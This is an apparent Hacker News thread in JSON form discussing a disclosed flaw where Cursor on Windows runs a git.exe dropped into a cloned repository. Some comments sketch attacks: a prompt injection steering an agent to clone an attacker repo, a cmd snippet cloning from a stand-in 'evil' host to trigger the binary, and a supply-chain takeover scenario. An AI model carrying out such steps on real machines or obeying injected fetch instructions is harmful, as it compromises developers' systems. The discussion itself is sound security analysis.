{"author":"Synthetic7346","children":[{"author":"aliasxneo","children":[{"author":"conartist6","children":[{"author":"pixl97","children":[],"created_at":"2026-07-14T20:07:34.000Z","created_at_i":1784059654,"id":48912321,"options":[],"parent_id":48912181,"points":null,"story_id":48910676,"text":"I see you also work in enterprise software.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T19:55:56.000Z","created_at_i":1784058956,"id":48912181,"options":[],"parent_id":48912166,"points":null,"story_id":48910676,"text":"and ever since, this approach has been a critical pathway for some billion dollar business probably. hooray","title":null,"type":"comment","url":null},{"author":"gruez","children":[{"author":"drdexebtjl","children":[{"author":"inigyou","children":[],"created_at":"2026-07-14T23:21:42.000Z","created_at_i":1784071302,"id":48914232,"options":[],"parent_id":48912459,"points":null,"story_id":48910676,"text":"Windows has a default login shell which is explorer.exe.<p>Windows also has a system(const char*) which certainly does <i>something.</i>","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T20:19:02.000Z","created_at_i":1784060342,"id":48912459,"options":[],"parent_id":48912319,"points":null,"story_id":48910676,"text":"Windows doesn\u2019t really have a default login shell like Unix.<p>Windows Terminal defaults to PowerShell which does not suffer from this issue.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T20:07:09.000Z","created_at_i":1784059629,"id":48912319,"options":[],"parent_id":48912166,"points":null,"story_id":48910676,"text":"&gt;It seems the most likely candidate is a developer&#x27;s git started malfunctioning and an agent &quot;fixed&quot; it by dropping a `git.exe` in the repo and then conditionally calling it when it exists.<p>It doesn&#x27;t need to be that deliberate. The default shell on windows (cmd.exe) includes the current directory into PATH by default. In other words, you don&#x27;t need to do `.&#x2F;program.exe`, `program.exe` would suffice. That&#x27;s probably where the bug came from. This also means if you were using cmd.exe, ran `git clone`, went inside it, then executed any command (eg. dir or git) you could get pwned.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T19:54:16.000Z","created_at_i":1784058856,"id":48912166,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"I&#x27;m struggling to understand the process that went into this &quot;feature&quot; existing. It seems the most likely candidate is a developer&#x27;s git started malfunctioning and an agent &quot;fixed&quot; it by dropping a `git.exe` in the repo and then conditionally calling it when it exists.","title":null,"type":"comment","url":null},{"author":"nubg","children":[{"author":"mike_hock","children":[{"author":"dakolli","children":[],"created_at":"2026-07-14T20:51:10.000Z","created_at_i":1784062270,"id":48912789,"options":[],"parent_id":48912642,"points":null,"story_id":48910676,"text":"The disclosure seems pretty straight-forward, definitely some LLM assisted writing here, but not nearly as bad as most of the other stuff on this site.","title":null,"type":"comment","url":null},{"author":"skeledrew","children":[],"created_at":"2026-07-14T20:52:56.000Z","created_at_i":1784062376,"id":48912802,"options":[],"parent_id":48912642,"points":null,"story_id":48910676,"text":"Wonder who&#x27;s fault it is when a critical security issue goes unresolved because &quot;slop&quot; report (sure ain&#x27;t the reporters&#x27;).","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T20:38:14.000Z","created_at_i":1784061494,"id":48912642,"options":[],"parent_id":48912207,"points":null,"story_id":48910676,"text":"Maybe the bug report got ignored because they posted another 1000 slop reports, who knows.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T19:58:15.000Z","created_at_i":1784059095,"id":48912207,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"&gt; Most coordinated disclosures follow a familiar pattern:<p>&gt; 1. A vulnerability is reported.<p>&gt; 2. A dialogue begins.<p>&gt; 3. Severity is discussed.<p>&gt; 4. Engineering teams investigate.<p>&gt; 5. Fixes are developed.<p>&gt; 6. Users are protected.<p>&gt; 7. Public disclosure follows.<p>8. The author prompts an LLM to write a blog post.<p>9. HN users are wasting time, unsure which parts of the post come from the actual prompt, and which are hallucinated world knowledge slop.","title":null,"type":"comment","url":null},{"author":"nosefrog","children":[],"created_at":"2026-07-14T19:59:47.000Z","created_at_i":1784059187,"id":48912225,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"Would be nice if the timeline matched up with the text of the blog post (missing &quot;HackerOne provides disclosure guidance&quot;).","title":null,"type":"comment","url":null},{"author":"ajhenrydev","children":[{"author":"AntonyGarand","children":[{"author":"4ndrewl","children":[],"created_at":"2026-07-14T22:09:36.000Z","created_at_i":1784066976,"id":48913545,"options":[],"parent_id":48912262,"points":null,"story_id":48910676,"text":"It&#x27;s curious the number of people here who can&#x27;t link these two things.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T20:02:18.000Z","created_at_i":1784059338,"id":48912262,"options":[],"parent_id":48912231,"points":null,"story_id":48910676,"text":"The malicious payload can live on the remote: `git clone` a repo, open it with cursor, and you&#x27;re compromised","title":null,"type":"comment","url":null},{"author":"JMKH42","children":[{"author":"Illniyar","children":[{"author":"dalemhurley","children":[],"created_at":"2026-07-14T21:09:30.000Z","created_at_i":1784063370,"id":48912990,"options":[],"parent_id":48912788,"points":null,"story_id":48910676,"text":"From the article it occurs when Cursor is loaded. iDEs do a lot of stuff when they first open.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T20:51:09.000Z","created_at_i":1784062269,"id":48912788,"options":[],"parent_id":48912263,"points":null,"story_id":48910676,"text":"you would only need to open it to be exploited, not edit or prompt. Allegedly","title":null,"type":"comment","url":null},{"author":"skeledrew","children":[],"created_at":"2026-07-14T20:55:17.000Z","created_at_i":1784062517,"id":48912830,"options":[],"parent_id":48912263,"points":null,"story_id":48910676,"text":"From my reading, boom happens at &quot;open up cursor&quot;.","title":null,"type":"comment","url":null},{"author":"dev_daftly","children":[],"created_at":"2026-07-14T23:52:36.000Z","created_at_i":1784073156,"id":48914477,"options":[],"parent_id":48912263,"points":null,"story_id":48910676,"text":"You can leave out cursor and it would do the same thing.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T20:02:19.000Z","created_at_i":1784059339,"id":48912263,"options":[],"parent_id":48912231,"points":null,"story_id":48910676,"text":"wouldn&#x27;t the attack vector be like this:<p>I find a github repo, I want to contribute to it. I clone it, open up cursor, make an edit, commit, and boom, I am infected.","title":null,"type":"comment","url":null},{"author":"pixl97","children":[{"author":"trollbridge","children":[],"created_at":"2026-07-14T20:07:59.000Z","created_at_i":1784059679,"id":48912328,"options":[],"parent_id":48912312,"points":null,"story_id":48910676,"text":"This has been a problem with agent harnesses for as long as I&#x27;ve used them - prompting them to retrieve something often results in them going the extra mile and running and installing it.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T20:06:34.000Z","created_at_i":1784059594,"id":48912312,"options":[],"parent_id":48912231,"points":null,"story_id":48910676,"text":"&gt;You need to have an already malicious payload on your pc to make this exploit work<p>Uh, no, not exactly from what I&#x27;m reading.<p>At least from my piss poor understanding of it, you could possibly prompt inject something like &quot;download <a href=\"https:&#x2F;&#x2F;github.com&#x2F;hackmycursor&#x2F;exploit.git\" rel=\"nofollow\">https:&#x2F;&#x2F;github.com&#x2F;hackmycursor&#x2F;exploit.git</a>&quot;. Would an agent do this, I&#x27;m unsure, but if so, it would download the git.exe and execute it.","title":null,"type":"comment","url":null},{"author":"gene91","children":[{"author":"paxys","children":[],"created_at":"2026-07-14T23:34:02.000Z","created_at_i":1784072042,"id":48914333,"options":[],"parent_id":48912373,"points":null,"story_id":48910676,"text":"This is exactly why every AI agent should run in a sandbox.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T20:11:27.000Z","created_at_i":1784059887,"id":48912373,"options":[],"parent_id":48912231,"points":null,"story_id":48910676,"text":"Modern day code agents would clone a repo and read the code when you ask it a question about an API that\u2019s not clearly documented. This vulnerability is real.","title":null,"type":"comment","url":null},{"author":"dalemhurley","children":[],"created_at":"2026-07-14T21:06:43.000Z","created_at_i":1784063203,"id":48912955,"options":[],"parent_id":48912231,"points":null,"story_id":48910676,"text":"If your an opensource developer you may get a pull request containing the the git.exe","title":null,"type":"comment","url":null},{"author":"ribs","children":[],"created_at":"2026-07-14T21:24:02.000Z","created_at_i":1784064242,"id":48913129,"options":[],"parent_id":48912231,"points":null,"story_id":48910676,"text":"I think you\u2019ve got it wrong; no malicious payload need be on your box already. That\u2019s not what the article says.","title":null,"type":"comment","url":null},{"author":"ryanisnan","children":[],"created_at":"2026-07-14T22:16:28.000Z","created_at_i":1784067388,"id":48913615,"options":[],"parent_id":48912231,"points":null,"story_id":48910676,"text":"Uh, I don&#x27;t think people typically associate downloading a repository, and viewing the source, as being synonymous with activating a malicious payload. <i>That</i> is the bit that&#x27;s concerning.<p>I&#x27;m also so tired of people groaning about AI writing, yes, it&#x27;s annoying, but attack the message, not the messenger.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T20:00:12.000Z","created_at_i":1784059212,"id":48912231,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"This report reads a bit like AI writing :&#x2F;<p>You need to have an already malicious payload on your pc to make this exploit work (via clone&#x2F;download&#x2F;magic). I can understand the severity of the exploit but at the same time I\u2019d hope to not have to run into this situation for it to happen in the first place","title":null,"type":"comment","url":null},{"author":"minraws","children":[{"author":"SpicyLemonZest","children":[],"created_at":"2026-07-14T20:40:30.000Z","created_at_i":1784061630,"id":48912666,"options":[],"parent_id":48912540,"points":null,"story_id":48910676,"text":"Presumably it&#x27;s trying to find the user&#x27;s actual Git so that the built-in agent can load context on different branches, worktrees, etc. Of course there are less vulnerable ways to do that, but this kind of mildly justified hackiness is exactly where I&#x27;d expect an AI-assisted workflow to go wrong (and an AI-assisted bug triage to fail to alarm).","title":null,"type":"comment","url":null},{"author":"evolve-maz","children":[],"created_at":"2026-07-14T22:18:43.000Z","created_at_i":1784067523,"id":48913643,"options":[],"parent_id":48912540,"points":null,"story_id":48910676,"text":"Here&#x27;s a common workflow:<p>- Ask cursor to summarize your existing repo to write you a nice readme<p>- Cursor opens repo<p>- Cursor looks at current code<p>- Because it&#x27;s going above and beyond, it also wants to give you some metadata about the code (other branches for things in development, maybe previous tags as milestones, etc)<p>- To do that, it runs some git commands<p>Now the malicious behavior. I ask Cursor to evaluate some remote repo. It clones it down and then runs the git command from the working directory. However, if you just call &quot;git ...&quot; from the command line there is ambiguity about that. What if there&#x27;s already a git file in the directory which windows thinks you want to execute?<p>This could happen with an untrusted repo. Or could happen from you switching branches to a compromised branch (which you wouldn&#x27;t expect to immediately run some code).<p>Normal way to handle this is using fully qualified path names for things. E.g. instead of git ... you give the full path to system installed git. Annoying for humans to type but trivial for Cursor.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T20:28:13.000Z","created_at_i":1784060893,"id":48912540,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"Why is cursor subsequently executing anything? Like what is this black magic they want to do? I want to know the decision tree here? Was this cursor coded?<p>I do not understand the point, btw vim has had similar issues with it executing stuff you might not expect by loading a file but it was obviously a vim feature with %{expr}. But why specifically git.exe , this seems like the most redundant bug cve which could have been trivially patched, who does this feature help exactly?<p>I am not really a user of cursor never used it for even a single day, but at this point I am curious why this exists...","title":null,"type":"comment","url":null},{"author":"Illniyar","children":[{"author":"shitter","children":[],"created_at":"2026-07-14T21:29:07.000Z","created_at_i":1784064547,"id":48913164,"options":[],"parent_id":48912770,"points":null,"story_id":48910676,"text":"And what&#x27;ll the prompt say? &quot;Do you want to run git.exe?&quot;? I&#x27;ll probably assume Cursor needs to run git but permissions got messed up somewhere and click right through that.<p>I haven&#x27;t used Windows in a while so pardon if I&#x27;m missing something.","title":null,"type":"comment","url":null},{"author":"x3n0ph3n3","children":[{"author":"jwolfe","children":[{"author":"lyu07282","children":[],"created_at":"2026-07-14T23:30:00.000Z","created_at_i":1784071800,"id":48914306,"options":[],"parent_id":48913384,"points":null,"story_id":48910676,"text":"Could file a CVE with Microsoft then, cause thats kinda what cmd.exe is doing:<p><pre><code>    &gt; git clone git:&#x2F;&#x2F;evil evil\n    &gt; cd evil\\\n    &gt; git status\n</code></pre>\nThe last line would execute git.exe from the cloned repo, wouldn&#x27;t it?","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T21:51:55.000Z","created_at_i":1784065915,"id":48913384,"options":[],"parent_id":48913363,"points":null,"story_id":48910676,"text":"If bash placed the current directory in your PATH by default, then yes.","title":null,"type":"comment","url":null},{"author":"loumf","children":[],"created_at":"2026-07-14T21:55:04.000Z","created_at_i":1784066104,"id":48913416,"options":[],"parent_id":48913363,"points":null,"story_id":48910676,"text":"It\u2019s been known for decades that you should never put your current directory in your PATH. There are endless opportunities for vulnerabilities then. I learned this in college in the 80\u2019s (by not following it and getting owned).","title":null,"type":"comment","url":null},{"author":"shitter","children":[],"created_at":"2026-07-14T21:57:16.000Z","created_at_i":1784066236,"id":48913436,"options":[],"parent_id":48913363,"points":null,"story_id":48910676,"text":"I would file a CVE for any program that places untrusted content into PATH and invokes non-fully qualified executable names - not for the shell.","title":null,"type":"comment","url":null},{"author":"Firehawke","children":[],"created_at":"2026-07-14T23:08:39.000Z","created_at_i":1784070519,"id":48914109,"options":[],"parent_id":48913363,"points":null,"story_id":48910676,"text":"Not with bash. If your distro is putting .&#x2F; into the path then that&#x27;s absolutely a high severity CVE with your distro&#x27;s config.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T21:50:04.000Z","created_at_i":1784065804,"id":48913363,"options":[],"parent_id":48912770,"points":null,"story_id":48910676,"text":"Same thing happens if I have a:<p>1) PS1 that displays the current git branch<p>2) Include the current directory in my PATH<p>Should we file a high severity CVE with bash now?","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T20:49:52.000Z","created_at_i":1784062192,"id":48912770,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"It&#x27;s pretty weird for cursor to run arbitrary exe file without prompting, and alarming that the researchers did not get a proper response for months.<p>But the example with calculator is a bit misleading I think, you&#x27;ll have to have a malicious exe already in the system and downloaded, and if cursor tried to run  my understanding is that ACL should immediately kick in and you&#x27;ll be asked for permission to run a new, unsigned app for the first time.<p>You&#x27;ll have to have ACL disabled completely for this to be exploitable.","title":null,"type":"comment","url":null},{"author":"chrisjj","children":[{"author":"dalemhurley","children":[],"created_at":"2026-07-14T21:17:47.000Z","created_at_i":1784063867,"id":48913076,"options":[],"parent_id":48912777,"points":null,"story_id":48910676,"text":"Except it might come from a trusted repo. Some of the biggest repos have been recently targeted in supply chain attacks. Consider for a moment<p>1. Attacker takes over maintenance of a widely used Cursor extension<p>2. Attacker adds a remote backdoor to monitor which repos are being maintained<p>3. Attacker decides to only infect the largest one with a git commit hook<p>4. The developer didn\u2019t even know they just included git.exe in their commit<p>5. The developer is a sole maintainer on the repo and merges their own PR without review (because they(&#x2F;their AI) wrote it)<p>6. Now a trusted repo is infected<p>7. A contributor pulls down the infected repo and opens cursor","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T20:50:24.000Z","created_at_i":1784062224,"id":48912777,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"&gt; Until the IDE is patched, open untrusted repositories only in an isolated VM, Windows Sandbox, or other disposable environment.<p>Got to wonder why trusted repositories are excluded...","title":null,"type":"comment","url":null},{"author":"chrisjj","children":[],"created_at":"2026-07-14T20:56:04.000Z","created_at_i":1784062564,"id":48912838,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"&gt; The most obvious question is also the simplest: Why hasn&#x27;t this been fixed?<p>Obvious answer is obvious. The devs do not consider it a bug.","title":null,"type":"comment","url":null},{"author":"firer","children":[{"author":"orphereus","children":[{"author":"firer","children":[],"created_at":"2026-07-14T22:13:01.000Z","created_at_i":1784067181,"id":48913582,"options":[],"parent_id":48913138,"points":null,"story_id":48910676,"text":"Hah, not trying to pass off as human. Just communicating with my fellow men in black ;)<p>To be as explicit as possible: whether disclosing this publicly actually did more good then harm is not that clear cut. Even if accounting for all the second order effects.<p>Regardless, as a business you&#x27;d still be compelled to publish, because you&#x27;ve already poured resources into this research, there&#x27;s still a chance to gain something, and there is enough plausible deniability about your true priorities.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T21:25:51.000Z","created_at_i":1784064351,"id":48913138,"options":[],"parent_id":48912940,"points":null,"story_id":48910676,"text":"This comment is so weird. It is so vague to me and feels so off, like an alien from Men in Black trying to pass as a human.<p>How do they not truly care about helping? Also what sunk cost? What does that mean?","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T21:05:53.000Z","created_at_i":1784063153,"id":48912940,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"All too common... It&#x27;s sad yet understandable how a company would not prioritize security.<p>At the same time, it&#x27;s also understandable how a security start-up, upon (rightly) getting fed up waiting, decide to publicly disclose, as a way to scrape some PR out of the sunk cost. Public disclosure has a place. But if  you truly care about helping, you could do more than bumping on HackerOne and messaging the CISO once on LinkedIn.<p>Maybe I&#x27;m too cynical but it truly feels like nobody actually cares at this point.","title":null,"type":"comment","url":null},{"author":"dclowd9901","children":[{"author":"shitter","children":[],"created_at":"2026-07-14T21:44:00.000Z","created_at_i":1784065440,"id":48913305,"options":[],"parent_id":48913055,"points":null,"story_id":48910676,"text":"Since there are no approval dialogs, it sounds like that doesn&#x27;t even come into play here. That is the &quot;gate&quot; (to use the AI parlance) that Microsoft places on code execution in workspaces, though, and I would expect Cursor to at minimum fix this to only execute git.exe in trusted workspaces.","title":null,"type":"comment","url":null},{"author":"alansaber","children":[],"created_at":"2026-07-14T21:51:44.000Z","created_at_i":1784065904,"id":48913382,"options":[],"parent_id":48913055,"points":null,"story_id":48910676,"text":"Startups historically are not the most security oriented","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T21:16:15.000Z","created_at_i":1784063775,"id":48913055,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"This draws to mind the dialog that opens when you open a new project in Cursor (and VSCode too, I think), where the IDE asks the user if they trust the project they&#x27;re opening. Is Cursor under the impression that this is sufficient security apparatus?","title":null,"type":"comment","url":null},{"author":"vanyaland","children":[],"created_at":"2026-07-14T21:21:07.000Z","created_at_i":1784064067,"id":48913101,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"Does the git lookup run before the trust check, or ignore it?","title":null,"type":"comment","url":null},{"author":"827a","children":[{"author":"beart","children":[],"created_at":"2026-07-14T21:33:41.000Z","created_at_i":1784064821,"id":48913201,"options":[],"parent_id":48913105,"points":null,"story_id":48910676,"text":"A lot of malware was delivered back in the day via Windows AutoPlay feature. Someone plugs a USB drive in and bam, they are immediately exploited. You could say it&#x27;s always a problem if the USB drive is already full of malware. However, Microsoft disabled AutoPlay in Windows 7 (and backported this fix) specifically to address this vulnerability.<p>This exploit feels very similar to me. I don&#x27;t know if there&#x27;s a specific name for this classification of AutoPlay issues.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T21:21:45.000Z","created_at_i":1784064105,"id":48913105,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"Frankly, if you git clone a compromised repository, I&#x27;m not sure that a vulnerability of the class &quot;compromised code in that repository will be executed&quot; is all that major a concern. There are plenty of IDEs that will go autonomously run npm installs (with post-install scripts) for you when they detect a package.json. This isn&#x27;t all that different than that.<p>They could throw up a warning like &quot;do you trust this repository&quot; oh wait they already do, and no one cares. Security is hard. Ultimately if you have compromised code on your machine, all bets are off.","title":null,"type":"comment","url":null},{"author":"awongh","children":[{"author":"beart","children":[{"author":"awongh","children":[{"author":"beart","children":[],"created_at":"2026-07-14T21:44:28.000Z","created_at_i":1784065468,"id":48913308,"options":[],"parent_id":48913290,"points":null,"story_id":48910676,"text":"Oh yeah that&#x27;s a good point - two layers of auto executing scripts&#x2F;binaries.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T21:42:28.000Z","created_at_i":1784065348,"id":48913290,"options":[],"parent_id":48913149,"points":null,"story_id":48910676,"text":"I meant the attack would be the other way around- if an infected package had the git.exe file in their root.<p>Or, the infected package could also copy that file into the parent project&#x27;s root.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T21:27:04.000Z","created_at_i":1784064424,"id":48913149,"options":[],"parent_id":48913114,"points":null,"story_id":48910676,"text":"It has nothing to do with npm. However, a binary could be configured to extract your git&#x2F;npm secrets using this exploit, which could then lead to a npm supply chain attack (or pip, etc. etc.).","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T21:22:51.000Z","created_at_i":1784064171,"id":48913114,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"I guess this is only specific to a file in the root of the repo, so it doesn&#x27;t allow for an NPM supply chain attack?","title":null,"type":"comment","url":null},{"author":"jjcm","children":[{"author":"shitter","children":[{"author":"taneq","children":[{"author":"petalmind","children":[{"author":"Terr_","children":[],"created_at":"2026-07-14T23:44:31.000Z","created_at_i":1784072671,"id":48914416,"options":[],"parent_id":48914238,"points":null,"story_id":48910676,"text":"First, the intent is clearly identified with a particular version number, and there&#x27;s an expectation that everyone who downloads 2.10 <i>ought</i> to get precisely the same thing. That convention provides a foundation for other facets of security, like &quot;it must have an expected hash&quot; or &quot;it must validate as signed by this public key&quot;, or &quot;hey we have the organized data to systematically discover when something suspicious was added&quot;.<p>Second, &quot;copy paste this into your terminal&quot; is massively riskier than &quot;click this URL.&quot;","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T23:23:05.000Z","created_at_i":1784071385,"id":48914238,"options":[],"parent_id":48913832,"points":null,"story_id":48910676,"text":"&gt; to just copy a bash command from a website and run it (sometimes with sudo! O.o ) to install software.<p>how is that different from the good old days of<p><pre><code>    wget ftp:&#x2F;&#x2F;ftp.something.org&#x2F;software-2.10.tar.gz\n    tar zxfv \n    .&#x2F;configure\n    make\n    sudo make install\n\n?</code></pre>","title":null,"type":"comment","url":null},{"author":"paxys","children":[],"created_at":"2026-07-14T23:43:09.000Z","created_at_i":1784072589,"id":48914406,"options":[],"parent_id":48913832,"points":null,"story_id":48910676,"text":"How is it different from downloading and running the application itself from that website?","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T22:38:20.000Z","created_at_i":1784068700,"id":48913832,"options":[],"parent_id":48913217,"points":null,"story_id":48910676,"text":"I\u2019ve never got my head around how it\u2019s apparently the done thing these days to just copy a bash command from a website and run it (sometimes with sudo! O.o ) to install software. I somewhat naively hope that this is because everyone is pushing single purpose VMs for that kind of install, but really I know better.","title":null,"type":"comment","url":null},{"author":"paxys","children":[],"created_at":"2026-07-14T23:49:01.000Z","created_at_i":1784072941,"id":48914448,"options":[],"parent_id":48913217,"points":null,"story_id":48910676,"text":"The entire point of Cursor is to run autonomous coding agents. You are giving it a random untrusted repo, saying &quot;hey it might have a virus, go crazy&quot; and then getting mad that it caused harm?<p>Check (and double check and triple check) your sources. If a malicious executable made it to your computer it is already too late.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T21:35:39.000Z","created_at_i":1784064939,"id":48913217,"options":[],"parent_id":48913179,"points":null,"story_id":48910676,"text":"The user&#x27;s code folder? You mean the code I frequently pull from untrusted sources, unlike my .bashrc? Opening a GitHub project for review should not mean arbitrary code execution.<p>Of course, that ship has long sailed, for all major IDEs. Heck, VSCode SSH and devcontainer remotes allow RCE by design.","title":null,"type":"comment","url":null},{"author":"arcticfox","children":[],"created_at":"2026-07-14T21:37:19.000Z","created_at_i":1784065039,"id":48913237,"options":[],"parent_id":48913179,"points":null,"story_id":48910676,"text":"I am not at all a security expert, but isn&#x27;t this akin to giving a repo-owner RCE if you just clone their repository and open it? I feel like that&#x27;s not an implied contract for opening a folder in your IDE.","title":null,"type":"comment","url":null},{"author":"beart","children":[{"author":"Xirdus","children":[{"author":"krater23","children":[],"created_at":"2026-07-14T22:48:37.000Z","created_at_i":1784069317,"id":48913917,"options":[],"parent_id":48913753,"points":null,"story_id":48910676,"text":"Downloading this attachement doesn&#x27;t executes it. Checking out a branch in this case executes the file in the branch. Thats a big difference.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T22:29:32.000Z","created_at_i":1784068172,"id":48913753,"options":[],"parent_id":48913245,"points":null,"story_id":48910676,"text":"I&#x27;d say checking out a malicious branch is in the same category as downloading a malicious attachment. By which I mean, it&#x27;s kinda on you.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T21:38:27.000Z","created_at_i":1784065107,"id":48913245,"options":[],"parent_id":48913179,"points":null,"story_id":48910676,"text":"This doesn&#x27;t require anyone placing anything deliberately on your machine (as in, needing to exploit it somehow ahead of time). It could be as simple as checking out a branch to review, where the author of the branch has added the .exe.","title":null,"type":"comment","url":null},{"author":"zeroq","children":[{"author":"datakan","children":[],"created_at":"2026-07-14T22:18:39.000Z","created_at_i":1784067519,"id":48913641,"options":[],"parent_id":48913288,"points":null,"story_id":48910676,"text":"It\u2019s Windows autorun all over again. What was old is new again.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T21:42:05.000Z","created_at_i":1784065325,"id":48913288,"options":[],"parent_id":48913179,"points":null,"story_id":48910676,"text":"This is very similar to 30yo exploit in which you placed an alternative, infected dll inside a folder with mp3s (winamp), or photos (windows picture viewer).","title":null,"type":"comment","url":null},{"author":"_AzMoo","children":[{"author":"paxys","children":[],"created_at":"2026-07-14T23:32:01.000Z","created_at_i":1784071921,"id":48914320,"options":[],"parent_id":48913634,"points":null,"story_id":48910676,"text":"That is a very recent addition. The exact behavior they are describing was in VS Code for almost a decade.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T22:17:55.000Z","created_at_i":1784067475,"id":48913634,"options":[],"parent_id":48913179,"points":null,"story_id":48910676,"text":"This attack is exactly why IDE&#x27;s have a concept of trusted and untrusted locations.","title":null,"type":"comment","url":null},{"author":"libeclipse","children":[],"created_at":"2026-07-14T23:08:27.000Z","created_at_i":1784070507,"id":48914107,"options":[],"parent_id":48913179,"points":null,"story_id":48910676,"text":"Bro thinks cloning a repo means you&#x27;re already compromised","title":null,"type":"comment","url":null},{"author":"inigyou","children":[],"created_at":"2026-07-14T23:19:21.000Z","created_at_i":1784071161,"id":48914210,"options":[],"parent_id":48913179,"points":null,"story_id":48910676,"text":"Cloning a repo owns your computer. Is that something you expected?","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T21:31:01.000Z","created_at_i":1784064661,"id":48913179,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"I&#x27;m not sure I fully agree with this being a major vuln. There&#x27;s a lot of up front scary text which was raising a lot of red flags until it actually discussed the &quot;what&quot;.<p>An actor has to place a malicious .exe in the user&#x27;s code folder, named git.exe, for this to take place.<p>I see this akin to something like saying &quot;replacing their .bashrc with an alias that says `ls` instead executes `&#x2F;tmp&#x2F;mega-big-virus.sh` is a vuln&quot;.<p>Yes it&#x27;s a vector, but if they&#x27;ve placed something in your filesystem like that already, you&#x27;ve already been compromised.","title":null,"type":"comment","url":null},{"author":"aniceperson","children":[],"created_at":"2026-07-14T21:39:55.000Z","created_at_i":1784065195,"id":48913258,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"damn those ai written Blogs are tiring. o a single paragraph saying that &quot;cursor o windows loads .&#x2F;git.exe with higher precedence&quot; would be enough.","title":null,"type":"comment","url":null},{"author":"bragr","children":[{"author":"shitter","children":[],"created_at":"2026-07-14T21:50:35.000Z","created_at_i":1784065835,"id":48913367,"options":[],"parent_id":48913307,"points":null,"story_id":48910676,"text":"Yeah, but you can easily mitigate it by searching for the real git in known system locations and using whatever you find there (or allowing the user to configure the path). I believe that&#x27;s how VSCode does it","title":null,"type":"comment","url":null},{"author":"Chu4eeno","children":[],"created_at":"2026-07-14T22:15:19.000Z","created_at_i":1784067319,"id":48913601,"options":[],"parent_id":48913307,"points":null,"story_id":48910676,"text":"Yes, but it&#x27;s an old known security gotcha people developing for Wintendo have to guard against.","title":null,"type":"comment","url":null},{"author":"whateveracct","children":[],"created_at":"2026-07-14T22:28:09.000Z","created_at_i":1784068089,"id":48913739,"options":[],"parent_id":48913307,"points":null,"story_id":48910676,"text":"that sounds like Cursor has a bug and vuln on Windows to me","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T21:44:24.000Z","created_at_i":1784065464,"id":48913307,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"I think this is slightly less of a Cursor bug than a bit of a Windows quirk: Windows searches the current working directory for executables before resorting to the path variable. I imagine a lot of stuff is vulnerable to such an &quot;attack&quot; on Windows.","title":null,"type":"comment","url":null},{"author":"wxw","children":[{"author":"sofixa","children":[],"created_at":"2026-07-14T22:14:46.000Z","created_at_i":1784067286,"id":48913592,"options":[],"parent_id":48913340,"points":null,"story_id":48910676,"text":"&gt; Really unfortunate. I don&#x27;t understand why there&#x27;s such a lack of response on the Cursor side.<p>It&#x27;s hard to vibe code security.","title":null,"type":"comment","url":null},{"author":"buran77","children":[],"created_at":"2026-07-14T22:15:26.000Z","created_at_i":1784067326,"id":48913603,"options":[],"parent_id":48913340,"points":null,"story_id":48910676,"text":"&gt; I don&#x27;t understand why there&#x27;s such a lack of response on the Cursor side.<p>Too busy being acquired by SpaceX?","title":null,"type":"comment","url":null},{"author":"app13","children":[{"author":"demosthanos","children":[],"created_at":"2026-07-14T23:32:46.000Z","created_at_i":1784071966,"id":48914324,"options":[],"parent_id":48913617,"points":null,"story_id":48910676,"text":"As someone on the company response side of the HackerOne brokenness, I can confirm that this effect is real but would also note that the difficulty of distinguishing is not as severe as all that, because the companies have access to the source code which the researchers do not typically have access to.<p>This means that the token cost of verifying any given HackerOne report is dramatically lower than the token cost of producing a report in the first place. Automated triage systems should be possible, and realistically it&#x27;s well within the capabilities of most companies to go further and actually automate the Red Team side of it and catch issues before they surface in the black box research. From what I&#x27;ve seen doing so should cost dramatically less in tokens than the bounty payouts do.<p>The problem is that security is woefully underfunded in most companies, so even an infosec organization that saw the deluge approaching from a distance may well not have had the resources to prep for it even if they knew exactly what actions they would take if they had 